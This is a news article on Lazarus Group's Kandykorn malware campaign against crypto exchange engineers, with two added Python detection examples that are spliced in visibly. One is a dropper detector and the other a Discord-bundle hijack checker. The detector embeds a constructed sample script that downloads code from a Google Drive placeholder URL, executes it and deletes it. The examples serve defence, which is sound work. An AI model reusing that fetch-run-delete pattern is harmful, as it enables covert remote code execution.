The state-sponsored North Korean hacking group Lazarus Group has once again made headlines, this time with an attack on a cryptocurrency exchange. Using a new piece of malware called “Kandykorn,” the group attempted to compromise the exchange's engineers and gain unauthorized access to valuable cryptoassets.
Lazarus Group’s New Malware: Kandykorn
On October 31, Elastic Security Labs reported the discovery of Lazarus Group’s use of a new malicious software (malware) family called Kandykorn. The activity dates back to April 2023 and overlaps with earlier Lazarus Group operations. Elastic Security Labs attributed it to the group after analysing the network infrastructure and the techniques employed, both of which match previous Lazarus campaigns.
Lazarus operators posed as blockchain engineers and approached engineers from the unnamed cryptocurrency exchange on a public Discord server. They lured their targets by claiming to have built a highly profitable arbitrage bot, capable of exploiting price differences between cryptocurrencies on various exchanges. To persuade the engineers to download and run the malware, they packaged it as a Python arbitrage tool with innocuous file names like “config.py” and “pricetable.py.”
The Implant: KANDYKORN
Elastic Security Labs analysed the implant, known as KANDYKORN, which Lazarus Group built to monitor and interact with the compromised host while evading detection. KANDYKORN is delivered through a five-stage process, with each stage downloading the next.
The attack chain begins when the victim runs the Python entry point “Main.py,” which imports a script named “watcher.py.” This script connects to a remote Google Drive account and downloads content into a file named “testSpeed.py,” executes it once, and then deletes it to remove traces from disk. During that brief execution, testSpeed.py acts as a dropper: it fetches another Python file, “FinderTools,” from a Google Drive URL. FinderTools is itself a dropper, and it downloads and executes a hidden second-stage payload known as SUGARLOADER.
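The download-run-delete pattern described above (fetch a script from a file-sharing host, execute it once, then remove it) is something a defender can hunt for statically before a script is ever run. The following is an added example, not code from the original article or from Elastic's report: a small Python static analyzer built on the standard `ast` module that flags a script as a dropper when it contains a Google Drive URL, writes a file, executes that same file, and then deletes it. The two sample scripts inside it are constructed for this example and are not the Lazarus code.

```python
import ast
import re

# Constructed sample in the shape of the watcher.py stage described above:
# download from Google Drive, stage to disk, run once, delete. Not real malware.
SAMPLE_DROPPER = '''
import os, urllib.request, subprocess
url = "https://drive.google.com/uc?export=download&id=EXAMPLE_ID"
data = urllib.request.urlopen(url).read()
with open("testSpeed.py", "wb") as f:
    f.write(data)
subprocess.run(["python3", "testSpeed.py"])
os.remove("testSpeed.py")
'''

# Constructed benign sample: fetches price data but stages nothing to disk.
SAMPLE_BENIGN = '''
import requests
r = requests.get("https://api.example.com/prices")
prices = r.json()
print(prices)
'''

# Call names treated as "execute something" and "delete something".
EXEC_CALLS = {"exec", "subprocess.run", "subprocess.Popen", "subprocess.call",
              "subprocess.check_output", "os.system", "runpy.run_path"}
DELETE_CALLS = {"os.remove", "os.unlink"}
DRIVE_URL = re.compile(r"https?://(drive|docs)\.google\.com/")


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def _strings_in(node):
    """All string constants appearing anywhere inside a node (args, lists, kwargs)."""
    return {c.value for c in ast.walk(node)
            if isinstance(c, ast.Constant) and isinstance(c.value, str)}


def analyze(source):
    """Collect the four signals the dropper heuristic needs from one script."""
    tree = ast.parse(source)
    findings = {"download_urls": [], "written_files": set(),
                "executed_files": set(), "deleted_files": set()}
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if DRIVE_URL.search(node.value):
                findings["download_urls"].append(node.value)
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        if name == "open" and node.args and isinstance(node.args[0], ast.Constant):
            # Record files opened for writing: these are staging targets.
            mode = ""
            if len(node.args) > 1 and isinstance(node.args[1], ast.Constant):
                mode = str(node.args[1].value)
            for kw in node.keywords:
                if kw.arg == "mode" and isinstance(kw.value, ast.Constant):
                    mode = str(kw.value.value)
            if "w" in mode or "a" in mode:
                findings["written_files"].add(str(node.args[0].value))
        elif name in EXEC_CALLS:
            findings["executed_files"].update(_strings_in(node))
        elif name in DELETE_CALLS:
            findings["deleted_files"].update(_strings_in(node))
    return findings


def is_dropper(source):
    """True when a script downloads from Drive, then writes, runs and deletes one file."""
    f = analyze(source)
    staged = f["written_files"] & f["executed_files"]
    wiped = staged & f["deleted_files"]
    return bool(f["download_urls"]) and bool(wiped)


if __name__ == "__main__":
    print("dropper sample:", is_dropper(SAMPLE_DROPPER))  # True
    print("benign sample: ", is_dropper(SAMPLE_BENIGN))   # False
```

The heuristic keys on the combination, not on any single call: downloading from Google Drive is common, and so is deleting a temporary file, but writing a file, executing it and unlinking it in the same script is the dropper shape. It only sees string literals, so a filename built at runtime or a `pathlib.Path(...).unlink()` call would slip past it; a production rule would pair this with runtime telemetry such as process creation events for `python3` with a short-lived script argument.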
SUGARLOADER is protected by a binary packer, which hides its real code from most signature-based malware detection. Elastic Security Labs got around the packer by stopping the program once its initialization routine had run and dumping the unpacked code from virtual memory. Once running, SUGARLOADER connects to a remote command-and-control server and retrieves the final-stage payload, KANDYKORN, which it loads and executes directly in memory rather than writing it to disk.
Alongside SUGARLOADER, Elastic found a Swift-based, self-signed binary named HLOADER that masquerades as the legitimate Discord application. HLOADER provides persistence through a technique known as execution flow hijacking: the real Discord binary is renamed and HLOADER takes its place, so whenever the user launches Discord, HLOADER starts both the genuine application and SUGARLOADER. KANDYKORN, the final payload, is a full-featured Remote Access Trojan (RAT) whose capabilities include file enumeration, execution of additional malware, data exfiltration, process termination, and execution of arbitrary commands.
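The persistence trick above leaves a recognisable footprint in the application bundle: the bundle's declared main executable is no longer the original, and the original sits beside it under a different name. As an added example (not code from the original article or from Elastic), here is a Python checker that inspects a macOS `.app` bundle for that shape and for hidden Mach-O files in its `MacOS/` directory. The bundle layout, the `Discord.lock` and `.log` file names, and the minimal Mach-O headers it writes are constructed for this example; it builds a throwaway bundle in a temporary directory so it runs on any platform.

```python
import os
import plistlib
import tempfile

# Mach-O magic numbers (32/64-bit, both byte orders) plus the fat-binary magic.
MACHO_MAGICS = {b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
                b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
                b"\xca\xfe\xba\xbe"}


def _is_macho(path):
    """True when the file starts with a Mach-O or fat-binary magic number."""
    with open(path, "rb") as fh:
        return fh.read(4) in MACHO_MAGICS


def inspect_bundle(app_path):
    """Return a list of suspicious findings for one .app bundle (empty = clean)."""
    findings = []
    contents = os.path.join(app_path, "Contents")
    with open(os.path.join(contents, "Info.plist"), "rb") as fh:
        info = plistlib.load(fh)
    exe_name = info.get("CFBundleExecutable", "")
    macos_dir = os.path.join(contents, "MacOS")
    main_exe = os.path.join(macos_dir, exe_name)
    if not os.path.isfile(main_exe):
        return ["declared main executable is missing"]
    if not _is_macho(main_exe):
        findings.append("declared main executable is not a Mach-O")
    for entry in sorted(os.listdir(macos_dir)):
        full = os.path.join(macos_dir, entry)
        if entry == exe_name or not os.path.isfile(full):
            continue
        # A Mach-O named "<main>.<something>" next to the main executable is the
        # signature of the real binary having been moved aside for an impostor.
        if entry.startswith(exe_name + ".") and _is_macho(full):
            findings.append(f"renamed Mach-O beside main executable: {entry}")
        # Dot-prefixed Mach-O files have no business in MacOS/.
        if entry.startswith(".") and _is_macho(full):
            findings.append(f"hidden Mach-O in MacOS/: {entry}")
    return findings


def build_demo_bundle(root, hijacked):
    """Write a constructed Discord.app; when hijacked=True, add the swap artefacts."""
    app = os.path.join(root, "Discord.app")
    macos_dir = os.path.join(app, "Contents", "MacOS")
    os.makedirs(macos_dir)
    with open(os.path.join(app, "Contents", "Info.plist"), "wb") as fh:
        plistlib.dump({"CFBundleExecutable": "Discord",
                       "CFBundleIdentifier": "com.example.discord"}, fh)
    # 64-bit little-endian Mach-O magic followed by zero padding: enough to
    # satisfy the magic check, not a loadable binary.
    fake_macho = b"\xcf\xfa\xed\xfe" + b"\x00" * 28
    with open(os.path.join(macos_dir, "Discord"), "wb") as fh:
        fh.write(fake_macho)
    if hijacked:
        # Assumed names: the real binary moved aside, and a hidden loader beside it.
        with open(os.path.join(macos_dir, "Discord.lock"), "wb") as fh:
            fh.write(fake_macho)
        with open(os.path.join(macos_dir, ".log"), "wb") as fh:
            fh.write(fake_macho)
    return app


def demo(hijacked):
    """Build a constructed bundle in a temp dir and return inspect_bundle's findings."""
    with tempfile.TemporaryDirectory() as root:
        return inspect_bundle(build_demo_bundle(root, hijacked))


if __name__ == "__main__":
    print("clean bundle:   ", demo(False))
    print("hijacked bundle:", demo(True))
```

On a real Mac this structural check is only the first pass; the decisive test is the code signature, since a self-signed HLOADER cannot carry Discord's Team ID. Follow up with `codesign --verify --deep --strict /Applications/Discord.app` and compare the `TeamIdentifier` from `codesign -dv --verbose=4` against the vendor's, which this offline example cannot do.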
Through this command set the remote operator can, among other things, list directory contents and transfer victim files back to the attacker’s system. The discovery of the implant underlines how much effort Lazarus Group invests in its tooling and why exchanges need robust security controls on engineer workstations, not just on trading infrastructure.
Lazarus Group and Crypto Exchange Hacks
Crypto exchanges have become prime targets for cybercriminals, and Lazarus Group is at the forefront of these attacks. The group has been linked to numerous hacks, resulting in millions of dollars worth of stolen cryptoassets. The most notable recent incident was the attack on the sports betting platform Stake.com, in which over $40 million was stolen.
According to blockchain surveillance firm Elliptic, Lazarus Group has stolen nearly $240 million in cryptocurrencies since June. Its targets included crypto platforms such as Atomic Wallet, CoinsPaid, Alphapo, CoinEx, and Stake.com. The United States Federal Bureau of Investigation has accused Lazarus Group of being responsible for the CoinEx hack, as well as the attack on Stake.com and others.
According to a report from the institutional crypto platform provider 21.co, wallets connected to Lazarus Group contain around 1,600 Bitcoin, 10,810 Ether, and 64,490 Binance Coins. These staggering numbers emphasize the need for heightened security measures within the cryptocurrency industry.